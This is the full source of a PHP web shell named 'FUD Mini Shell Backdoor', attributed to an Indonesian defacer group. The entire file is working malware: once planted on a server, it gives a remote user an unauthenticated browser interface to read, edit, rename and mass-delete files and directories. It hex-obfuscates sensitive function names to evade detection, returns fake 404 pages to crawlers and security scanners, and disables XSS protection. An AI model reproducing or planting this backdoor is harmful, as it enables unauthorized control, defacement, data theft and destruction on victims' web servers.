[PHP] FUD Mini Shell Backdoor

<?php
/**
*
* [ FUD - MINI SHELL BACKDOOR ].
*
* @author BLACKHATCODE < BIMACYBERTEAM@GMAIL.COM >
* @copyright (C) 2019 INDONESIAN DEFACER.
* THANKS TO : B374K, ZER0BYTE, SHUTDOWN57, SHOR7CUT
*
**/
@session_start();
@ob_start();
set_time_limit(0);
error_reporting(0);
header("X-XSS-Protection: 0");
$config = array();
$config['version']  = "1.0"; // VERSION.SUBVERSION
$config['title']    = "5hell Controller ".$config['version']; // TITLE
// CLEAN MAGIC QUOTES
$_POST      = clean($_POST);
$_GET       = clean($_GET);
$_REQUEST   = clean($_REQUEST);
/**
* /-----------------------------------/
* / SOME DEFINE PATH, ACTION, ETC.    /
* /-----------------------------------/
*/
define('ROOT',getcwd());
define('DS',DIRECTORY_SEPARATOR);
define('CURR_PATH',(empty($_GET['u'])) ? ROOT : $_GET['u']);
// ****
$__getcwd       = "\x67"."\x65\x74\x63\x77\x64";
$__fget_con     = "\x66\x69\x6c\x65"."\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$__sc_dir       = "s"."\x63\x61\x6e\x64\x69"."r";
$__rm_dir       = "\x72\x6d\x64"."ir";
$__un_link      = "\x75\x6e"."\x6c\x69\x6e\x6b";
// BLOCK SEARCH ENGINE BOT
if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|acunetix|facebook|node|crawler|googlebot|facebookexternalhit|google|bing|yahoo|yahooseeker|yahoo!|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|PycURL|Mediapartners|facebok|rambler|msnbot|yandex|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
// MAGIC QUOTE BYPASS
function clean($arr){
    $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
    if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
        if(is_array($arr)){
            foreach($arr as $k=>$v){
                if(is_array($v)) $arr[$k] = clean($v);
                else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
                }
            }
        }
        return $arr;
    }
    // GET FILE PERMISSIONS
    function perms($__server_file){
        $perms = fileperms($__server_file);
        if(($perms & 0xC000) == 0xC000){$info = 's';
    }elseif (($perms & 0xA000) == 0xA000){$info = 'l';
    }elseif (($perms & 0x8000) == 0x8000){$info = '-';
    }elseif (($perms & 0x6000) == 0x6000){$info = 'b';
    }elseif (($perms & 0x4000) == 0x4000){$info = 'd';
    }elseif (($perms & 0x2000) == 0x2000){$info = 'c';
    }elseif (($perms & 0x1000) == 0x1000){$info = 'p';
    }else {$info = 'u';
}
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}
function mass_delete($filelok){
    if(is_dir($filelok)){
        if(!rmdir($filelok)){
            $s=scandir($filelok);
            foreach ($s as $ss) {
                if(is_file($filelok."/".$ss)){
                    if(unlink($filelok."/".$ss)){
                        $rm=rmdir($filelok);
                    }
                }
                if(is_dir($filelok."/".$ss)){
                    $rm=rmdir($filelok."/".$ss);
                    $rm.=rmdir($filelok);
                }
            }
        }elseif(is_file($filelok)){
            $rm = unlink($filelok);
        }
    }elseif(is_file($filelok)){
        $rm = unlink($filelok);
    }
    return $rm;
}
function redirect($kemana, $apa = 'html'){
    if($apa == 'html'){
        echo "<meta http-equiv='refresh' content='0;url={$kemana}'>";
    }elseif($apa == 'js'){
        echo "<script>window.location.href='{$kemana}';</script>";
    }elseif($apa == 'php'){
        @ob_start();
        header('location:'.$kemana);
        flush();
    }
}
// SERVER INFORMATION
$__server_software  = getenv("SERVER_SOFTWARE");
$__server_system    = php_uname();
$__server_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
$__server_my_ip = $_SERVER['REMOTE_ADDR'];
$__server_info  = "<table><tr><td>↺&nbsp;".$__server_system."</td></tr>";
$__server_info .= "<tr><td>↺&nbsp;".$__server_software."</td></tr>";
$__server_info .= "<tr><td>↺&nbsp;Server IP : ".$__server_server_ip."<span class='gaya'> | </span>Your IP : ".$__server_my_ip;
$__server_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
$__server_info .= "</table>";

echo "<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<meta name='robots' content='noindex, nofollow, noarchive'>
<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
<script type='text/javascript' src='https://code.jquery.com/jquery-3.4.0.min.js'></script>
<script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vanilla-lazyload@8.17.0/dist/lazyload.min.js'></script>
<script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vanilla-lazyload@10.19.0/dist/lazyload.min.js'></script>
<script type='text/javascript'>
function select_all(pilih){
    var cek = document.getElementsByName('fl[]');
    for (var i =0; n=cek.length;i++) {
        cek[i].checked = pilih.checked;
    }
}
function hs(a,x){
    document.getElementById(a).style.display='block';
    document.getElementById(x).style.display='none';
}
</script>
<title>".$config['title']." - ".$_SERVER['HTTP_HOST']." </title>
<link rel='shortcut icon' href='http://nzsc.xtgem.com/favicon.png' />
<style type='text/css'>
body{margin-top: 10px;margin-left: 100px;margin-right: 100px;background-color: #0D0C0C;}
*{font-family:Ubuntu Mono,serif;}body{background:#0D0C0C;font-size:13px;color:#ffffff;font-weight:400;}hr{border:1px solid #222222;}a{color:#4C83AF;text-decoration:none;}a:hover{color:#ffffff;}pre{padding:0 8px;}form{display:inline;}table th,p{cursor:default;}#main{background:#111111;-moz-border-radius:10px;border-radius:10px;width:100%;padding:2px 8px;}#header{text-align:left;margin:0;padding:0;}#header td{margin:0;padding:0;}#header h1{font-size:20px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);margin:0;padding:0;}#header h1 a,.explorelist:hover a{color:#ffffff;}#menu{background:#111111;margin:0 2px 4px;}#result{-moz-border-radius:10px;border-radius:10px;border:1px solid #4C83AF;line-height:16px;background:#111111;color:#aaaaaa;margin:0 0 8px;padding:4px 8px;}.headinfo{border-left:1px solid #4C83AF;margin:6px;padding:2px 0 0 16px;}.headtbls tr{height:24px;vertical-align:middle;}.gaya,.ver{color:#4C83AF;font-weight:700;}.ver{-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);letter-spacing:2px;}.menumi{background:#292929;color:#4C83AF;text-decoration:none;letter-spacing:2px;font-size:13px;-moz-border-radius:4px;border-radius:4px;margin:0;padding:4px 6px;}.menumi:hover{background:#363636;}.inputz,.prompt,.txtarea{background:#111111;border:0;border-bottom:1px solid #393939;font-size:13px;color:#ffffff;padding:2px;}.prompt{font-weight:700;}.txtarea{width:100%;height:370px;}.inputzbut{font-size:13px;background:#191919;color:#4C83AF;border:1px solid #222222;margin:0 4px;}.explore{width:100%;padding:4px 0;}.explore a{text-decoration:none;}.explore td{border-bottom:1px solid #222222;line-height:24px;vertical-align:top;padding:0 8px;}.explore th{font-weight:700;background:#222222;padding:6px 8px;}.explore tr:hover{background:#181818!important;}.sembunyi{display:none;margin:0;padding:0;}.info table{width:100%;border-radius:6px;border:1px solid #4C83AF;margin:4px 0;padding:8px;}.info th,th{background:#181818;font-weight:700;}.info td{border-bottom:1px solid #222222;}.info h2{text-align:center;font-size:15px;background:#1c1c1c;letter-spacing:6px;border-radius:6px;border-bottom:1px solid #4C83AF;margin:4px 0 8px;padding:10px;}.info a{color:#cccccc;}.viewfile{width:100%;border-bottom:1px solid #222222;margin:0 0 4px;}.viewfile td{border-bottom:1px solid #222222;background:#181818;height:24px;padding:2px 4px;}.viewfilecontent{padding:11px 8px;}.mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid #4C83AF;margin:4px 0 8px;padding:14px 8px;}.mybox h2{border-bottom:1px solid #444444;color:#4C83AF;margin:0;padding:0 0 8px;}.notif{background:#4C83AF;color:#000000;border-radius:6px;font-weight:700;margin:3px 0;padding:4px 8px 2px;}.notif a{color:#000000;}.footer{text-align:right;font-size:10px;letter-spacing:2px;color:#222222;padding:0 16px;}.headtbl,.myboxtbl{width:100%;}input[type=checkbox].css-checkbox + label.css-label{padding-left:20px;height:15px;display:inline-block;line-height:15px;background-repeat:no-repeat;background-position:0 0;vertical-align:middle;cursor:pointer;}input[type=checkbox].css-checkbox:checked + label.css-label{background-position:0 -15px;}.info,.info h1,.info hr,input[type=checkbox].css-checkbox{display:none;}.css-label{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAAeCAYAAADzXER0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAASdJREFUeNrsk0GKwjAYhZNJqYviQpDKLOcY3sOFIF5DFF0KgjeYAwizmDuNOxHcFrGlje9pA1KbNOqshvnh2YD58v6m75dxHIdCiAk0gt5Fc+2gDbQO8DNTSk1D1BtKSikoWxVF0U7TdJ5lmSI8BtfCARKsoFyw1poeLcBjwl0aEgqCwAma4n5yhC+AceSzqdD69RAD+zjedSBeqH/4CfiA74bgaG+o3HxQURR1sOgjnqpMDv+0ikZJkpzyPP9kwlbIaQgNsO55GO+hb2hp3vnI1Hl2XZT7xe+PJNbWYWgcyao7L+p22h4ayephdyPJVl3v+jFcuhNmg+tAazxvN9tA86m83H6+Fm5n3mpd49sSlDaYN3jJb8WFazMy2rftujb/yEieBRgAZHG/OeGef6MAAAAASUVORK5CYII=);}
</style>
</head>
<body>";
echo $__server_info;
if (isset($_GET['path'])){
    $path = $_GET['path']; chdir($_GET['path']);
}else{
    $path = $__getcwd();
}
$path  = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo '<table width="100%" border="0" align="center""><tr><td>';
echo "↺&nbsp;Location : ";
foreach ($paths as $id => $location){
    echo "<a href='?path=";
    for ($i = 0; $i <= $id; $i++){
        echo $paths[$i];
        if ($i != $id){
            echo "/";
        }
    }
    echo "'>$location / </a>";
}
echo '&nbsp;- [ <a href="?">Home</a> ]</font></td>';
echo '<tr><td></table><br />';
if(isset($_POST['sac'])){
    if($_POST['action'] == 'delete'){
        foreach($_POST['fl'] as $dfil){
            @mass_delete($dfil);
        }
    }
    @redirect('?path='.CURR_PATH.'');
}elseif(isset($_GET['filesrc'])){
    echo '<table width="100%" border="0" cellpadding="1" cellspacing="1" align="center">
    <tr><td>
    Filename : '.basename($_GET['filesrc']).'
    </tr></td></table><br />';
    echo "<center><div id='result'><textarea class='inputzbut' style='margin: 0px; height: 357px; width: 100%;'' readonly=''>" . htmlspecialchars($__fget_con($_GET['filesrc'])) . "</textarea></div></center>";
}elseif($_POST['opt'] == 'rename'){
    if(isset($_POST['newname'])){
        if(rename($_POST['path'], $path.'/'.$_POST['newname'])){
            $result = '<font color="#00ff00">Rename File OK !</font>';
        }else{
            $result = '<font color="red">Rename File Failed !</font>';
        }
        $_POST['name'] = $_POST['newname'];
    }
    echo '<form method="POST">
    <div id="result">
    New Filename : <input name="newname" class="inputz" style="width:40%;height:19px;" type="text" value="'.$_POST['name'].'" />
    <input class="inputzbut" style="width:100px;height:23px;" type="submit" value="Save Change" />
    <label>'.$result.'</label>
    <input type="hidden" name="path" value="'.$_POST['path'].'">
    <input type="hidden" name="opt" value="rename">
    </div></form>';
}elseif($_POST['opt'] == 'edit'){
    if(isset($_POST['src'])){
        $fp = fopen($_POST['path'], 'w');
        if(fwrite($fp, $_POST['src'])){
            $result = '<font color="#00ff00">Edit File OK !</font>';
        }else{
            $result = '<font color="red">Edit File Failed !</font>';
        }
        fclose($fp);
    }
    echo '<form method="POST">
    <div id="result">
    Filename : <input class="inputz" style="width:40%;height:19px;" type="text" name="path" value="'.$_POST['path'].'" />
    <input class="inputzbut" style="width:100px;height:23px;" type="submit" value="Save Change" />
    <label>'.$result.'</label>
    <input type="hidden" name="opt" value="edit"><br /><br />
    <textarea class="inputzbut" style="margin: 0px; height: 357px; width: 100%;" name="src" id="src">'.htmlspecialchars($__fget_con($_POST['path'])).'</textarea></form></div>';
}else{
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if ($_POST['type'] == 'dir') {
            if ($__rm_dir($_POST['path'])){
                $result = '<font color="#00ff00">Delete Folder OK !</font>';
            }else{
                $result = '<font color="red">Delete Folder Failed !</font>';
            }
        }elseif($_POST['type'] == 'file'){
            if ($__un_link($_POST['path'])){
                $result = '<font color="#00ff00">Delete File OK !</font>';
            }else{
                $result = '<font color="red">Delete File Failed !</font>';
            }
        }
    }
    $_scdir = $__sc_dir($path);
    echo '<div id="result">
    <form method="post">
    <table class="explore sortable" border="0" cellpadding="3" cellspacing="1" align="center">
    <thead>
    <tr class="first">
    <th width="1%"><input id="checkalll" type="checkbox" name="fl[]" onclick="select_all(this)" /></th>
    <th><center>Filename</center></th>
    <th width="10%"><center>Size</center></th>
    <th width="10%"><center>Permissions</center></th>
    <th width="15%"><center>Last Update</center></th>
    <th width="15%"><center>Options</center></th></tr>
    </thead>';
    foreach ($_scdir as $dir) {
        if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..')
            continue;
        echo "<tr>
        <td><center><input type='checkbox' name='fl[]' value='".CURR_PATH.DS."{$dir}' /></center></td>
        <td><img src='http://nzsc.xtgem.com/folder.png' width=15px>&nbsp;
        <a href=\"?path=$path/$dir\">[ $dir ]</a></td>
        <td><center>--</center></td>
        <td><center>";
        if (is_writable("$path/$dir"))
            echo '<font color="#00ff00">';
        elseif (!is_readable("$path/$dir"))
            echo '<font color="red">';
        echo perms("$path/$dir");
        if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
            echo '</font>';
        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";
        echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select class=\"inputzbut\" name=\"opt\"><option value=\"\"></option><option value=\"rename\">Rename</option><option value=\"delete\">Delete</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" class=\"inputzbut\" value=\"+\" /></form></center></td></tr>";
    }
    foreach ($_scdir as $file) {
        if (!is_file("$path/$file"))
            continue;
        $size = filesize("$path/$file") / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . ' MB';
        } else {
            $size = $size . ' KB';
        }
        echo "<tr>
        <td><center><input type='checkbox' name='fl[]' value='".CURR_PATH.DS."{$file}' /></center></td>
        <td><img src='http://nzsc.xtgem.com/file2.png' width=15px>&nbsp;
        <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
        <td>".$size."</td>
        <td><center>";
        if (is_writable("$path/$file"))
            echo '<font color="#00ff00">';
        elseif (!is_readable("$path/$file"))
            echo '<font color="red">';
        echo perms("$path/$file");
        if (is_writable("$path/$file") || !is_readable("$path/$file"))
            echo '</font>';
        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";
        echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select class=\"inputzbut\" name=\"opt\"><option value=\"\"></option><option value=\"edit\">Edit</option><option value=\"rename\">Rename</option><option value=\"delete\">Delete</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" class=\"inputzbut\" value=\"+\" /></form></center></td></tr>";
    }
    echo '<tr>
    <td style="text-align:center;border-top:3px ;text-indent:4px;">
    <input id="checkalll" class="css-checkbox" type="checkbox" name="fl[]" onclick="select_all(this)" />
    <label for="checkalll" class="css-label"></label>
    </td>
    <td style="border-top:3px ;">
    <select id="action" name="action" class="inputzbut" style="width:85%;height:18px;margin:0;">
    <option value="" disabled selected>--- [ Choose Action ] ---</option>
    <option value="delete">Delete</option>
    </select>
    <input type="submit" value="Execute" name="sac" class="inputzbut" />
    </td>
    </form>
    </td>
    </tr>
    </table></div>';
}
echo '<br><center>&copy; <a href="">2019</a> - Indonesian Defacer</center><br>';
echo '</body></html>';
?>